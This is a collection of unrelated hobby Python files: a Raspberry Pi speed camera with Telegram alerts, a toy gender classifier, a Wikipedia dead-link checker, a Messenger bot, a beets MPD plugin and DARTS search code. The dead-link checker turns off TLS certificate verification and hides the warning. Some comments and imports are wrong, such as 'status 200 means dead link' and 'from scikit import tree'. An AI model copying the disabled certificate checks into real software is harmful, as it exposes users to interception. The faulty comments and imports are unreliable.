# Initialize Bot
self.bot = None
if self.telegram_token and self.telegram_chat_id:
self.bot = telegram.Bot(self.telegram_token)
# Write headers to the output csv
f = Path(self.RECORD_FILENAME)
if not f.is_file():
self.write_csv(self.RECORD_HEADERS)
def send_animation(self, timestamp, events, confidence, mph):
folder = "logs/{}-{:02.0f}mph-{:.0f}".format(timestamp.strftime('%Y-%m-%d_%H:%M:%S.%f'), mph, confidence)
gif_file = "{}.gif".format(folder)
json_file = "{}.json".format(folder)
# Create the directory
Path(folder).mkdir(parents=True, exist_ok=True)
data = []
for e in events:
# annotate it
image = annotate_image(e['image'], e['ts'], mph=e['mph'], confidence=confidence, x=e['x'], y=e['y'], w=e['w'], h=e['h'])
# and save the image to disk
cv2.imwrite("{}/{}.jpg".format(folder, e['ts']), image)
del(e['image'])
e['ts'] = e['ts'].timestamp()
data.append(e)
with open(json_file, 'w') as outfile:
json.dump(data, outfile)
# Create a gif
p = subprocess.Popen(["/usr/bin/convert", "-delay", "10", "*.jpg", "../../{}".format(gif_file)], cwd=folder)
p.wait()
# Remove the temporary files
shutil.rmtree(folder, ignore_errors=True)
# Send message
self.send_gif(
filename=gif_file,
text='{:.0f} mph @ {:.0f}%'.format(mph, confidence)
)
return gif_file
def write_csv(self, message):
f = open(self.RECORD_FILENAME, 'a')
f.write(message + "\n")
f.close
def send_message(self, text):
if not self.bot:
return
self.bot.send_message(
chat_id=self.telegram_chat_id,
text=text
)
def send_image(self, filename, text):
if not self.bot:
return
self.bot.send_photo(
chat_id=self.telegram_chat_id,
photo=open(filename, 'rb'),
caption=text
)
def send_gif(self, filename, text):
if not self.bot:
return
self.bot.send_animation(
chat_id=self.telegram_chat_id,
animation=open(filename, 'rb'),
caption=text
)
def record(self, confidence, image, timestamp, mean_speed, avg_area, sd_speed, sd_area, speeds, secs, direction, events):
if confidence < self.min_confidence or mean_speed < self.min_speed or avg_area < self.min_area:
return False
# Write the log
self.write_csv("{},{:.0f},{:.0f},{:.0f},{:.0f},{:d},{:.2f},{:s}".format(
timestamp.timestamp(), mean_speed, sd_speed, avg_area, sd_area, len(speeds), secs, str_direction(direction))
)
# If the threshold is high enough, alert and write to disk
if confidence >= self.min_confidence_alert and mean_speed >= self.min_speed_alert:
p = Process(target=self.send_animation, args=(timestamp, events, confidence, mean_speed,))
p.start()
return True
# calculate speed from pixels and time
def get_speed(pixels, ftperpixel, secs):
if secs > 0.0:
return ((pixels * ftperpixel)/ secs) * 0.681818
else:
return 0.0
# calculate pixel width
def get_pixel_width(fov, distance, image_width):
frame_width_ft = 2 * (math.tan(math.radians(fov * 0.5)) * distance)
ft_per_pixel = frame_width_ft / float(image_width)
return ft_per_pixel
def str_direction(direction):
if direction == LEFT_TO_RIGHT:
return "LTR"
elif direction == RIGHT_TO_LEFT:
return "RTL"
else:
return "???"
# calculate elapsed seconds
def secs_diff(endTime, begTime):
diff = (endTime - begTime).total_seconds()
return diff
def parse_command_line():
preview = False
config_file = None
logging.info("Initializing")
args = docopt(__doc__)
if args['preview']:
preview=True
if args['--config']:
config_file = Path(args['--config'])
if not config_file.is_file():
logging.error("config file does NOT exist")
exit(1)
return (preview, config_file)
def detect_motion(image, min_area):
# dilate the thresholded image to fill in any holes, then find contours
# on thresholded image
image = cv2.dilate(image, None, iterations=2)
(_, cnts, _) = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# look for motion
motion_found = False
biggest_area = 0
x = 0
y = 0
w = 0
h = 0
# examine the contours, looking for the largest one
for c in cnts:
(x1, y1, w1, h1) = cv2.boundingRect(c)
# get an approximate area of the contour
found_area = w1 * h1
# find the largest bounding rectangle
if (found_area > min_area) and (found_area > biggest_area):
biggest_area = found_area
motion_found = True
x = x1
y = y1
w = w1
h = h1
return (motion_found, x, y, w, h, biggest_area)
def annotate_image(image, timestamp, mph=0, confidence=0, h=0, w=0, x=0, y=0):
global cfg
# colors
color_green = (0, 255, 0)
color_red = (0, 0, 255)
# make it gray
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
# timestamp the image
cv2.putText(image, timestamp.strftime("%d %B %Y %H:%M:%S.%f"),
(10, image.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, color_red, 2)
# write the speed
if mph > 0:
msg = "{:.0f} mph".format(mph)
(size, _) = cv2.getTextSize(msg, cv2.FONT_HERSHEY_SIMPLEX, 2, 3)
# then center it horizontally on the image
cntr_x = int((cfg.image_width - size[0]) / 2)
cv2.putText(image, msg, (cntr_x, int(cfg.image_height * 0.2)), cv2.FONT_HERSHEY_SIMPLEX, 2.00, color_red, 3)
# write the confidence
if confidence > 0:
msg = "{:.0f}%".format(confidence)
(size, _) = cv2.getTextSize(msg, cv2.FONT_HERSHEY_SIMPLEX, 2, 3)
# then right align it horizontally on the image
cntr_x = int((cfg.image_width - size[0]) / 4) * 3
cv2.putText(image, msg, (cntr_x, int(cfg.image_height * 0.2)), cv2.FONT_HERSHEY_SIMPLEX, 1.00, color_red, 3)
# define the monitored area right and left boundary
cv2.line(image, (cfg.upper_left_x, cfg.upper_left_y),
(cfg.upper_left_x, cfg.lower_right_y), color_green, 4)
cv2.line(image, (cfg.lower_right_x, cfg.upper_left_y),
(cfg.lower_right_x, cfg.lower_right_y), color_green, 4)
# Add the boundary
if h > 0 and w > 0:
cv2.rectangle(image,
(cfg.upper_left_x + x, cfg.upper_left_y + y),
(cfg.upper_left_x + x + w, cfg.upper_left_y + y + h), color_green, 2)
return image
# initialize the camera. Adjust vflip and hflip to reflect your camera's orientation
def setup_camera(cfg):
logging.info("Booting up camera")
# initialize the camera. Adjust vflip and hflip to reflect your camera's orientation
camera = PiCamera(resolution=cfg.resolution, framerate=cfg.fps, sensor_mode=5)
camera.vflip = cfg.camera_vflip
camera.hflip = cfg.camera_hflip
# start capturing
capture = PiRGBArray(camera, size=camera.resolution)
# allow the camera to warm up
time.sleep(2)
return (camera, capture)
# Setup logging
Path("logs").mkdir(parents=True, exist_ok=True)
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(message)s',
handlers=[
logging.FileHandler(FILENAME_SERVICE),
logging.StreamHandler()
]
)
# parse command-line
(PREVIEW, config_file) = parse_command_line()
# load config
cfg = Config.load(config_file)
# setup camera
(camera, capture) = setup_camera(cfg)
# determine the boundary
logging.info("Monitoring: ({},{}) to ({},{}) = {}x{} space".format(
cfg.upper_left_x, cfg.upper_left_y, cfg.lower_right_x, cfg.lower_right_y, cfg.monitored_width, cfg.monitored_height))
# initialize messaging
recorder = Recorder(cfg)
# calculate the the width of the image at the distance specified
l2r_ft_per_pixel = get_pixel_width(cfg.fov, cfg.l2r_distance, cfg.image_width)
r2l_ft_per_pixel = get_pixel_width(cfg.fov, cfg.r2l_distance, cfg.image_width)
logging.info("L2R: {:.0f}ft from camera == {:.2f} per pixel".format(cfg.l2r_distance, l2r_ft_per_pixel))
logging.info("R2L: {:.0f}ft from camera == {:.2f} per pixel".format(cfg.r2l_distance, r2l_ft_per_pixel))
state = WAITING
direction = UNKNOWN
# location
initial_x = 0
initial_w = 0
last_x = 0
last_w = 0
biggest_area = 0
areas = np.array([])
# timing
initial_time = datetime.now(timezone.utc)
cap_time = datetime.now(timezone.utc)
timestamp = datetime.now(timezone.utc)
# speeds
sd = 0
speeds = np.array([])
counter = 0
# event captures
events = []
# fps
fps_time = datetime.now(timezone.utc)
fps_frames = 0
# capture
base_image = None
# stats
stats_l2r = np.array([])
stats_r2l = np.array([])
stats_time = datetime.now(timezone.utc)
# startup
has_started = False
# capture frames from the camera (using capture_continuous.
# This keeps the picamera in capture mode - it doesn't need
# to prep for each frame's capture.
#
for frame in camera.capture_continuous(capture, format="bgr", use_video_port=True):
# initialize the timestamp
timestamp = datetime.now(timezone.utc)
# Save a preview of the image
if not has_started:
image = annotate_image(frame.array, timestamp)
cv2.imwrite("preview.jpg", image)
recorder.send_image(
filename='preview.jpg',
text='Current View'
)
has_started = True
if PREVIEW:
exit(0)
# Log the current FPS
fps_frames += 1
if fps_frames > 1000:
elapsed = secs_diff(timestamp, fps_time)
logging.info("Current FPS @ {:.0f}".format(fps_frames/elapsed))
fps_time = timestamp
fps_frames = 0
# Share stats every X hours
if secs_diff(timestamp, stats_time) > cfg.telegram_frequency * 60 * 60:
stats_time = timestamp
total = len(stats_l2r) + len(stats_r2l)
if total > 0:
l2r_perc = len(stats_l2r) / total * 100
r2l_perc = len(stats_r2l) / total * 100
l2r_mean = 0
r2l_mean = 0
if len(stats_l2r) > 0:
l2r_mean = np.mean(stats_l2r)
if len(stats_r2l) > 0:
r2l_mean = np.mean(stats_r2l)
recorder.send_message(
"{:.0f} cars in the past {:.0f} hours\nL2R {:.0f}% at {:.0f} speed\nR2L {:.0f}% at {:.0f} speed".format(
total, cfg.telegram_frequency, l2r_perc, l2r_mean, r2l_perc, r2l_mean
)
)
# clear stats
stats_l2r = np.array([])
stats_r2l = np.array([])
stats_time = timestamp
# grab the raw NumPy array representing the image
image = frame.array
# crop area defined by [y1:y2,x1:x2]
gray = image[
cfg.upper_left_y:cfg.lower_right_y,
cfg.upper_left_x:cfg.lower_right_x
]
# convert the fram to grayscale, and blur it
gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, BLURSIZE, 0)
# if the base image has not been defined, initialize it
if base_image is None:
base_image = gray.copy().astype("float")
lastTime = timestamp
capture.truncate(0)
continue
# compute the absolute difference between the current image and
# base image and then turn eveything lighter gray than THRESHOLD into
# white
frameDelta = cv2.absdiff(gray, cv2.convertScaleAbs(base_image))
thresh = cv2.threshold(frameDelta, THRESHOLD, 255, cv2.THRESH_BINARY)[1]
# look for motion in the image
(motion_found, x, y, w, h, biggest_area) = detect_motion(thresh, cfg.image_min_area)
if motion_found:
if state == WAITING:
# intialize tracking
state = TRACKING
initial_x = x
initial_w = w
last_x = x
last_w = w
initial_time = timestamp
last_mph = 0
# initialise array for storing speeds & standard deviation
areas = np.array([])
speeds = np.array([])
# event capturing
events = []
# detect gap and data points
car_gap = secs_diff(initial_time, cap_time)
logging.info('Tracking')
logging.info("Initial Data: x={:.0f} w={:.0f} area={:.0f} gap={}".format(initial_x, initial_w, biggest_area, car_gap))
logging.info(" x-Δ Secs MPH x-pos width area dir")
# if gap between cars too low then probably seeing tail lights of current car
# but I might need to tweek this if find I'm not catching fast cars
if (car_gap < cfg.min_distance):
state = WAITING
direction = UNKNOWN
motion_found = False
biggest_area = 0
capture.truncate(0)
base_image = None
logging.info("Car too close, skipping")
continue
else:
# compute the lapsed time
secs = secs_diff(timestamp, initial_time)
# timeout after 5 seconds of inactivity
if secs >= 5:
state = WAITING
direction = UNKNOWN
motion_found = False
biggest_area = 0
capture.truncate(0)
base_image = None
logging.info('Resetting')
continue
if state == TRACKING:
abs_chg = 0
mph = 0
distance = 0
if x >= last_x:
direction = LEFT_TO_RIGHT
distance = cfg.l2r_distance
abs_chg = (x + w) - (initial_x + initial_w)
mph = get_speed(abs_chg, l2r_ft_per_pixel, secs)
else:
direction = RIGHT_TO_LEFT
distance = cfg.r2l_distance
abs_chg = initial_x - x
mph = get_speed(abs_chg, r2l_ft_per_pixel, secs)
speeds = np.append(speeds, mph)
areas = np.append(areas, biggest_area)
# Store event data
events.append({
'image': image.copy(),
'ts': timestamp,
# Location of object
'x': x,
'y': y,
'w': w,
'h': h,
# Speed
'mph': mph,
# MPH is calculated from secs, delta, fov, distance, image_width
'fov': cfg.fov,
'image_width': cfg.image_width,
'distance': distance,
'secs': secs,
'delta': abs_chg,
# Other useful data
'area': biggest_area,
'dir': str_direction(direction),
})
# If we've stopped or are going backward, reset.
if mph <= 0:
logging.info("negative speed - stopping tracking")
if direction == LEFT_TO_RIGHT:
direction = RIGHT_TO_LEFT # Reset correct direction
x = 1 # Force save
else:
direction = LEFT_TO_RIGHT # Reset correct direction
x = cfg.monitored_width + MIN_SAVE_BUFFER # Force save
logging.info("{0:4d} {1:7.2f} {2:7.0f} {3:4d} {4:4d} {5:4d} {6:s}".format(
abs_chg, secs, mph, x, w, biggest_area, str_direction(direction)))
# is front of object outside the monitired boundary? Then write date, time and speed on image
# and save it
if ((x <= MIN_SAVE_BUFFER) and (direction == RIGHT_TO_LEFT)) \
or ((x+w >= cfg.monitored_width - MIN_SAVE_BUFFER)
and (direction == LEFT_TO_RIGHT)):
sd_speed = 0
sd_area = 0
confidence = 0
#you need at least 3 data points to calculate a mean and we're deleting two
if (len(speeds) > 3):
# Mean of all items except the first and last one
mean_speed = np.mean(speeds[1:-1])
# Mode of area (except the first and last)
avg_area = np.average(areas[1:-1])
# SD of all items except the last one
sd_speed = np.std(speeds[:-1])
sd_area = np.std(areas[1:-1])
confidence = ((mean_speed - sd_speed) / mean_speed) * 100
elif (len(speeds) > 1):
# use the last element in the array
mean_speed = speeds[-1]
avg_area = areas[-1]
# Set it to a very high value to highlight it's not to be trusted.
sd_speed = 99
sd_area = 99999
else:
mean_speed = 0 # ignore it
avg_area = 0
sd_speed = 0
sd_area = 0
logging.info("Determined area: avg={:4.0f} deviation={:4.0f} frames={:0d}".format(avg_area, sd_area, len(areas)))
logging.info("Determined speed: mean={:4.0f} deviation={:4.0f} frames={:0d}".format(mean_speed, sd_speed, len(speeds)))
logging.info("Overall Confidence Level {:.0f}%".format(confidence))
# If they are speeding, record the event and image
recorded = recorder.record(
image=image,
timestamp=timestamp,
confidence=confidence,
mean_speed=mean_speed,
avg_area=avg_area,
sd_speed=sd_speed,
sd_area=sd_area,
speeds=speeds,
secs=secs,
direction=direction,
events=events
)
if recorded:
logging.info("Event recorded")
if direction == LEFT_TO_RIGHT :
stats_l2r = np.append(stats_l2r, mean_speed)
elif direction == RIGHT_TO_LEFT:
stats_r2l = np.append(stats_r2l, mean_speed)
else:
logging.info("Event not recorded: Speed, Area, or Confidence too low")
state = SAVING
cap_time = timestamp
# if the object hasn't reached the end of the monitored area, just remember the speed
# and its last position
last_mph = mph
last_x = x
else:
if state != WAITING:
state = WAITING
direction = UNKNOWN
logging.info('Resetting')
# Adjust the base_image as lighting changes through the day
if state == WAITING:
last_x = 0
cv2.accumulateWeighted(gray, base_image, 0.25)
# clear the stream in preparation for the next frame
capture.truncate(0)
# cleanup the camera and close any open windows
cv2.destroyAllWindows()
|
AnnieJohnson25/Test | genderClassification.py | <gh_stars>0
from scikit import tree
#[height,weight,shoe size]
X=[[181,80,44],[177,70,43],[160,60,38],[154,54,37],[166,65,40],[190,90,47],[175,64,39],[177,70,40],[159,55,37],[171,75,42],[181,85,43]]
Y=['male','female','female','female','male','male','male','female','male','female','male']
#clf (short for classifier) variable to store decision tree model or classifier
clf=tree.DecisionTreeClassifier()
clf=clf.fit(X,Y)
#we use the variable: prediction to store the result of the new values which are compared to our tree values to predict the gender
prediction=clf.predict([[190,70,43]])
print(prediction) |
ViteshKhurana/RTU-DigitalLibrary | Python Programs/filewordcount.py | try:
f=open("file.txt")
except:
print("File not found ! ")
else:
a=f.read()
ls=a.split(" ")
dict={}
for word in ls:
if word in dict:
dict[word]+=1
else:
dict[word]=1
for word in dict:
print(word,"=",dict[word])
|
saiyerniakhil/python-75-hackathon | wikipedia-deadlink-finder/app.py | <reponame>saiyerniakhil/python-75-hackathon
from flask import render_template, Flask, request
import requests,re, csv, time
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
app = Flask(__name__)
def listify(filename):
input_wikilink_list = []
firstColumn = []
with open(filename) as f:
for line in f:
#if line.split(',')[0] != '\n':
firstColumn.append(line.split(',')[0])
return firstColumn
def url_validation(link):
urlregex = re.compile(
r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
return re.match(urlregex, str(link)) is not None
def deadLinkFinder(url):
linkset = []
first_column = []
urls = []
valid_urls = []
dead_links = []
conn_refused = []
forbidden_urls = []
first_column = listify('links.csv')
if(str(url) in first_column):
pos = first_column.index(str(url))
with open('links.csv','r') as f:
readcsv = list(csv.reader(f,delimiter=','))
req_row = readcsv[pos]
#print('Dead links:')
try:
for k in range(1,len(req_row) + 1):
#print("* ",req_row[k])
dead_links.append(req_row[k])
except IndexError:
print("")
else:
page = requests.get(str(url)) # The URL is of our choice
soup = BeautifulSoup(page.content, 'html.parser')
linkset = soup.find_all('a')
# To get the href from the collected Hyperlinks
for i in linkset:
urls.append(i.get('href'))
# Applying URL validation and Holding together all the valid URLs in a list.
for i in urls:
if url_validation(i):
valid_urls.append(i)
"""
Making request to all the valid URLs.
If the URL gives us a status-code, 200. Then it's a Dead Link.
If the URL gives us a status-code, 403. Then its a Forbidden Link.
"""
#print("Dead Links: ")
for i in valid_urls:
try:
temp_page = requests.get(i, verify=False)
if (temp_page.status_code == 403):
forbidden_urls.append(i)
elif not (temp_page.status_code == 200):
#print("* ", i)
dead_links.append(i)
except:
conn_refused.append(i)
if len(dead_links) != 0:
with open('links.csv', mode='a') as deadlinks:
deadlink_writer = csv.writer(deadlinks, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
deadlink_writer.writerow([str(url)]+dead_links)
return dead_links
# Finally printing out all the Dead Links,Forbidden Links and the URLs that are taking too long to respond.
# if len(dead_links) == 0:
# print("No Dead links found.")
# else:
# with open('links.csv',mode='w') as deadlinks:
# deadlink_writer = csv.writer(deadlinks,delimiter=',',quotechar='"',quoting=csv.QUOTE_MINIMAL)
# deadlink_writer.writerow([str(url)]+dead_links)
# print("Number of Dead links: ", len(dead_links))
@app.route("/")
def index():
return render_template("index.html")
@app.route("/view",methods=['POST', 'GET'])
def view():
if request.method == 'GET' :
return "Please submit the form"
else:
url = request.form.get('link_to')
start_time = time.time()
data = deadLinkFinder(url)
end_time = time.time() - start_time
total_number = len(data)
return render_template('output.html',data = data, time_taken = end_time,total=total_number)
|
saiyerniakhil/python-75-hackathon | wikipedia-deadlink-finder/code.py | import requests
from bs4 import BeautifulSoup
import re
import csv
import time
"""
To handle routing to insecure page i.e navigatiing to 'http' requests which donot
have SSL certificates and are consideres to be insecure.
The below lines are added to suppress the below error:
------------------------------------------------------
InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised.
"""
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
"""
Filtering URLs from the mixed collection of href's contaings routes, images and URLs based on a Regular Expression.
"""
def listify(filename):
input_wikilink_list = []
firstColumn = []
with open(filename) as f:
for line in f:
if line.split(',')[0] != '\n':
firstColumn.append(line.split(',')[0])
return firstColumn
def url_validation(link):
urlregex = re.compile(
r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
return re.match(urlregex, str(link)) is not None
#Making request to our desired Page on WikiPedia
def deadLinkFinder(url):
linkset = []
first_column = []
urls = []
valid_urls = []
dead_links = []
conn_refused = []
forbidden_urls = []
first_column = listify('links.csv')
if(str(url) in first_column):
pos = first_column.index(str(url))
with open('links.csv','r') as f:
readcsv = list(csv.reader(f,delimiter=','))
req_row = readcsv[pos]
print('Dead links:')
try:
for k in range(1,len(req_row) + 1):
print("* ",req_row[k])
except IndexError:
print("")
else:
page = requests.get(str(url)) # The URL is of our choice
soup = BeautifulSoup(page.content, 'html.parser')
linkset = soup.find_all('a')
# To get the href from the collected Hyperlinks
for i in linkset:
urls.append(i.get('href'))
# Applying URL validation and Holding together all the valid URLs in a list.
for i in urls:
if url_validation(i):
valid_urls.append(i)
"""
Making request to all the valid URLs.
If the URL gives us a status-code, 200. Then it's a Dead Link.
If the URL gives us a status-code, 403. Then its a Forbidden Link.
"""
print("Dead Links: ")
for i in valid_urls:
try:
temp_page = requests.get(i, verify=False)
except:
conn_refused.append(i)
if (temp_page.status_code == 403):
forbidden_urls.append(i)
elif not (temp_page.status_code == 200):
print("* ", i)
dead_links.append(i)
# Finally printing out all the Dead Links,Forbidden Links and the URLs that are taking too long to respond.
if len(dead_links) == 0:
print("No Dead links found.")
else:
with open('links.csv',mode='a') as deadlinks:
deadlink_writer = csv.writer(deadlinks,delimiter=',',quotechar='"',quoting=csv.QUOTE_MINIMAL)
deadlink_writer.writerow([str(url)]+dead_links)
print("Number of Dead links: ", len(dead_links))
""" if (len(conn_refused) != 0):
print('Urls which refused connection or taking long time:')
for i in conn_refused:
print("* ", i)
if(len(forbidden_urls) != 0):
print('Forbidden URLs:')
for i in forbidden_urls:
print("* ", i) """
link = input("Enter your URL")
start_time = time.time()
deadLinkFinder(link)
end_time = time.time()-start_time
print('total time taken = ',end_time) |
saiyerniakhil/python-75-hackathon | string-slices/strings.py | example = input('Enter a string')
'''
String sliciing:
a string is a like a python list and each and every element can be accessed by square bracket notation.
'''
print("example string's start to fifth characters "+example[:5])
print("example string's first to third characters "+example[1:3])
print("example string's fourth to the end of the string "+example[4:])
print("example string's fifth character from the end to first character from the end "+example[-5:-1])
print("example string's first to fifth characters "+example[1:5])
'''
Output:
Enter a string talentaccurate
example string's start to fifth characters tale
example string's first to third characters ta
example string's fourth to the end of the string entaccurate
example string's fifth character from the end to first character from the end urat
example string's first to fifth characters tale
Explanation:
t a l e n t a c c u r a t e
0 1 2 3 4 5 6 7 8 9 10 11 12 13
-14 -13 -12 -11 -10 -9 -8 -7 -6 -5 -4 -3 -2 -1
'''
|
saiyerniakhil/python-75-hackathon | introduction/intro.py | print('''
This repository is a part of Talent Accurate's python-75-hackathon.
* How to download python?
- Download python from their official website here (https://www.python.org/downloads/release/python-371/)
* How to run python?
you can run python in two ways
- command line
- integrated developemnt environment (IDLE)
* For more info visit (https://www.python.org/doc/)
''')
|
saiyerniakhil/python-75-hackathon | text-input-and-output/text-input-and-output.py | '''
Text input in python
input can be taken from the user by two ways using input function. Both ways are shown in this file.
'''
print('Enter your firstname')
firstname = input()
print('the firstname you entered is '+ firstname)
lastname = input('Enter your lastname')
print('the lastname you entered is ',lastname)
'''
Output:
Enter your firstname
Tom
the firstname you entered isTom
Enter your lastname Holland
the lastname you entered is Holland
'''
|
edjacob25/Bot | application.py | from flask import Flask, request, abort
from flask.logging import default_handler
from logging.config import dictConfig
import configparser
import os
import requests
import traceback
def configure_logging():
if not os.path.exists("logs/default.log"):
os.mkdir("logs")
dictConfig({
'version': 1,
'formatters': {'default': {
'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s',
}},
'handlers': {
'wsgi': {
'class': 'logging.StreamHandler',
'stream': 'ext://flask.logging.wsgi_errors_stream',
'formatter': 'default'
},
'files': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'logs/default.log',
'formatter': 'default'
}
},
'root': {
'level': 'INFO',
'handlers': ['wsgi', 'files']
}
})
configure_logging()
app = Flask(__name__)
app.logger.removeHandler(default_handler)
@app.route("/")
def hello():
app.logger.info("Hello there")
return get_link()
@app.route("/webhook")
def verification():
config = configparser.ConfigParser()
config.read('vars.ini')
original_token = config["Tokens"]["fb_verify_token"]
mode = request.args["hub.mode"]
token = request.args["hub.verify_token"]
challenge = request.args["hub.challenge"]
if mode is None or token is None:
abort(403)
elif mode == "subscribe" and token == original_token:
return challenge
else:
abort(403)
@app.route("/webhook", methods=["POST"])
def messages():
# '{"object": "page", "entry": [{"messaging": [{"message": "TEST_MESSAGE"}]}]}'
all = request.json
if all["object"] == "page":
for item in all["entry"]:
try:
send_message_back(item["messaging"][0]["sender"]["id"])
except Exception as e:
app.logger.info("Could not send message")
app.logger.error(e)
app.logger.error(traceback.format_exc())
app.logger.info(item)
app.logger.info(item["messaging"][0])
return "EVENT_RECEIVED"
else:
abort(404)
def send_message_back(user_id):
config = configparser.ConfigParser()
config.read('vars.ini')
access_token = config["Tokens"]["access_token_page"]
message = {"text": "Por el momento solo te devuelvo la foto del perrito del dia, que es {}".format(get_link())}
data = {"recipient": {"id": user_id}, "message": message}
requests.post("https://graph.facebook.com/v10.0/me/messages",
params={"access_token": access_token},
json=data)
def get_link():
r = requests.post("https://www.reddit.com/api/v1/access_token",
data={"grant_type":"https://oauth.reddit.com/grants/installed_client", "device_id": "DO_NOT_TRACK_THIS_DEVICE"},
auth=("ZJKlJzbFxkGauA", ""),
headers={'User-agent': 'Muzei for reddit 0.1'})
token = r.json()['access_token']
r2 = requests.get("https://api.reddit.com/r/rarepuppers/top?t=day&limit=1",
headers={'User-agent': 'Muzei for reddit 0.1', "Authentication": "bearer {}".format(token)})
j = r2.json()
return j["data"]["children"][0]["data"]["url"]
if __name__ == "__main__":
app.run(host='0.0.0.0')
|
dbogdanov/beets-mpdadd | setup.py | from setuptools import setup
setup(
name='beets-mpdadd',
version='0.2',
description='beets plugin that adds query results to the current MPD playlist',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
platforms='ALL',
packages=['beetsplug'],
install_requires=['beets', 'python-mpd2'],
)
|
dbogdanov/beets-mpdadd | beetsplug/mpdadd.py | <gh_stars>0
from beets.plugins import BeetsPlugin
from beets.ui import Subcommand
from beets import ui
from beets import config
from os.path import relpath
from mpd import MPDClient
def mpd_add(lib, opts, args):
"""Converts results from a query to relative uris and sends them to MPD.
"""
# Read user configuration.
host = config['mpd']['host'].get()
port = config['mpd']['port'].get()
password = config['mpd']['password'].get()
music_directory = config['mpd']['music_directory'].get()
# Print how many items are being added
def aye(item_list, item_type):
num = len(item_list)
if num > 1:
item_type += 's'
elif num == 0:
ui.print_(ui.colorize('red', 'No items match your query.'))
return
elif num > 100:
ui.print_(ui.colorize('red', 'Add %s %s to playlist?' % (num, item_type)))
if ui.input_options(('Yes', 'No')) == 'n':
sys.exit(0)
ui.print_(ui.colorize('brown', 'Adding %s %s to playlist...' % (num, item_type)))
# Perform query and retrieve the absolute path to the results.
if opts.album:
paths = [albums.path for albums in lib.albums(ui.decargs(args))]
aye(paths, 'album')
else:
paths = [items.path for items in lib.items(ui.decargs(args))]
aye(paths, 'track')
# Generate relative paths of the results from user specified directory.
playlist = [relpath(item.decode("utf-8"), music_directory) for item in paths]
# Initialize client object.
client = MPDClient()
# Authenticate with password if one is provided.
if password:
client.password(password)
# Connect to MPD.
client.connect(host,port)
# Optionally clear current playlist before adding music.
if opts.clear:
client.clear()
# Iterate through URIs and send them to MPD.
for uri in playlist:
client.add(uri)
# Send the play command to MPD and close the connection.
client.play()
client.close()
client.disconnect()
class MPDAddPlugin(BeetsPlugin):
def __init__(self):
super(MPDAddPlugin, self).__init__()
config['mpd'].add({
'host': u'localhost',
'port': 6600,
'password': u'',
'music_directory': config['directory'].as_filename(),
})
def commands(self):
mpd_add_command = Subcommand(
'add',
help='add music to your playlist'
)
mpd_add_command.parser.add_option(
'-a', '--album',
action='store_true', default=False,
help='add albums instead of tracks'
)
mpd_add_command.parser.add_option(
'-c', '--clear',
action='store_true', default=False,
help='clears current playlist before adding music'
)
mpd_add_command.func = mpd_add
return [mpd_add_command]
|
zhengjian2322/darts-pt | sota/cnn/model_search_sdarts.py | <gh_stars>1-10
import torch.nn.functional as F
from sota.cnn.operations import *
from sota.cnn.genotypes import Genotype
import sys
sys.path.insert(0, '../../')
from sota.cnn.model_search import Network
class SDartsNetwork(Network):
def __init__(self, C, num_classes, layers, criterion, primitives, args,
steps=4, multiplier=4, stem_multiplier=3, drop_path_prob=0.0):
super(SDartsNetwork, self).__init__(C, num_classes, layers, criterion, primitives, args,
steps, multiplier, stem_multiplier, drop_path_prob)
self.softmaxed = False
def _save_arch_parameters(self):
self._saved_arch_parameters = [p.clone() for p in self._arch_parameters]
def softmax_arch_parameters(self):
self.softmaxed = True
self._save_arch_parameters()
for p in self._arch_parameters:
p.data.copy_(F.softmax(p, dim=-1))
def restore_arch_parameters(self):
self.softmaxed = False
for i, p in enumerate(self._arch_parameters):
p.data.copy_(self._saved_arch_parameters[i])
del self._saved_arch_parameters
def get_softmax(self):
if self.softmaxed:
weights_normal = self.alphas_normal
weights_reduce = self.alphas_reduce
else:
weights_normal = F.softmax(self.alphas_normal, dim=-1)
weights_reduce = F.softmax(self.alphas_reduce, dim=-1)
return {'normal': weights_normal, 'reduce': weights_reduce}
|
zhengjian2322/darts-pt | sota/cnn/spaces.py | from collections import OrderedDict
primitives_1 = OrderedDict([('primitives_normal', [['skip_connect',
'dil_conv_3x3'],
['skip_connect',
'dil_conv_5x5'],
['skip_connect',
'dil_conv_5x5'],
['skip_connect',
'sep_conv_3x3'],
['skip_connect',
'dil_conv_3x3'],
['max_pool_3x3',
'skip_connect'],
['skip_connect',
'sep_conv_3x3'],
['skip_connect',
'sep_conv_3x3'],
['skip_connect',
'dil_conv_3x3'],
['skip_connect',
'sep_conv_3x3'],
['max_pool_3x3',
'skip_connect'],
['skip_connect',
'dil_conv_3x3'],
['dil_conv_3x3',
'dil_conv_5x5'],
['dil_conv_3x3',
'dil_conv_5x5']]),
('primitives_reduct', [['max_pool_3x3',
'avg_pool_3x3'],
['max_pool_3x3',
'dil_conv_3x3'],
['max_pool_3x3',
'avg_pool_3x3'],
['max_pool_3x3',
'avg_pool_3x3'],
['skip_connect',
'dil_conv_5x5'],
['max_pool_3x3',
'avg_pool_3x3'],
['max_pool_3x3',
'sep_conv_3x3'],
['skip_connect',
'dil_conv_3x3'],
['skip_connect',
'dil_conv_5x5'],
['max_pool_3x3',
'avg_pool_3x3'],
['max_pool_3x3',
'avg_pool_3x3'],
['skip_connect',
'dil_conv_5x5'],
['skip_connect',
'dil_conv_5x5'],
['skip_connect',
'dil_conv_5x5']])])
primitives_2 = OrderedDict([('primitives_normal', 14 * [['skip_connect',
'sep_conv_3x3']]),
